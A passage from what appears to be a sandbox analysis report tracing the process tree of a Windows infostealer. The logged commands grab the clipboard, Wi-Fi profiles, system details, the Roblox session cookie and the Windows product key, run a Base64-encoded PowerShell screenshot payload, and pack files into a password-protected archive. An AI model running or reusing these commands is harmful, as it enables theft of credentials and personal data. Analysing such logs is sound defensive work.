      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:5612
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:5656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:6364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5748
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:6384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5964
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:5792
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:6536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:6076
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:6544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:6132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:6472
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0nwdqkbe\0nwdqkbe.cmdline"
        5⤵
        
        PID:6408
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAF6A.tmp" "c:\Users\Admin\AppData\Local\Temp\0nwdqkbe\CSC9B64D16CA45744F6B43ECD5D4271E2A6.TMP"
        6⤵
        
        PID:6776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:7056
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2292
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6112
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6252
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1068
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1224"
    3⤵
    PID:6128
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1224
      4⤵
      Kills process with taskkill
      PID:6508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4212"
    3⤵
    PID:6536
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4212
      4⤵
      Kills process with taskkill
      PID:5496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4936"
    3⤵
    PID:840
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4936
      4⤵
      Kills process with taskkill
      PID:6112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4836"
    3⤵
    PID:6724
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4836
      4⤵
      Kills process with taskkill
      PID:7032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2652"
    3⤵
    PID:6480
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2652
      4⤵
      Kills process with taskkill
      PID:5632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2680"
    3⤵
    PID:6264
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2680
      4⤵
      Kills process with taskkill
      PID:6780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2316"
    3⤵
    PID:6684
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2316
      4⤵
      Kills process with taskkill
      PID:6776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2944"
    3⤵
    PID:5896
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2944
      4⤵
      Kills process with taskkill
      PID:5908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5352"
    3⤵
    PID:6420
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5352
      4⤵
      Kills process with taskkill
      PID:6040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:6960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4408
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:6648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:6276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:6472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI58002\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\qJR6w.zip" *"
    3⤵
    PID:5740
  - - C:\Users\Admin\AppData\Local\Temp\_MEI58002\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI58002\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\qJR6w.zip" *
      4⤵
      Executes dropped EXE
      PID:5548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:5496
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6536
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:5932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:7064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:6800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:6676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffee1ae9758,0x7ffee1ae9768,0x7ffee1ae9778
  2⤵
  PID:6532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1768 --field-trial-handle=2728,i,16179518613274147413,9398647200778412846,131072 /prefetch:2
  2⤵
  PID:3428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 --field-trial-handle=2728,i,16179518613274147413,9398647200778412846,131072 /prefetch:8
  2⤵
  PID:4252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1976 --field-trial-handle=2728,i,16179518613274147413,9398647200778412846,131072 /prefetch:8
  2⤵
  PID:3916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3252 --field-trial-handle=2728,i,16179518613274147413,9398647200778412846,131072 /prefetch:1
  2⤵
  PID:5264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3272 --field-trial-handle=2728,i,16179518613274147413,9398647200778412846,131072 /prefetch:1
  2⤵
  PID:3636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4184 --field-trial-handle=2728,i,16179518613274147413,9398647200778412846,131072 /prefetch:1
  2⤵
  PID:2332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 --field-trial-handle=2728,i,16179518613274147413,9398647200778412846,131072 /prefetch:8
  2⤵
  PID:1604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 --field-trial-handle=2728,i,16179518613274147413,9398647200778412846,131072 /prefetch:8
  2⤵
  PID:6544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5352 --field-trial-handle=2728,i,16179518613274147413,9398647200778412846,131072 /prefetch:8
  2⤵
  PID:6116
- C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  PID:6220
- - C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff648127688,0x7ff648127698,0x7ff6481276a8
    3⤵
    PID:5124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1020 --field-trial-handle=2728,i,16179518613274147413,9398647200778412846,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:7120

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaulta2426f62h23d7h4259ha7a2h79f7a1f5d721
1⤵
PID:2408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
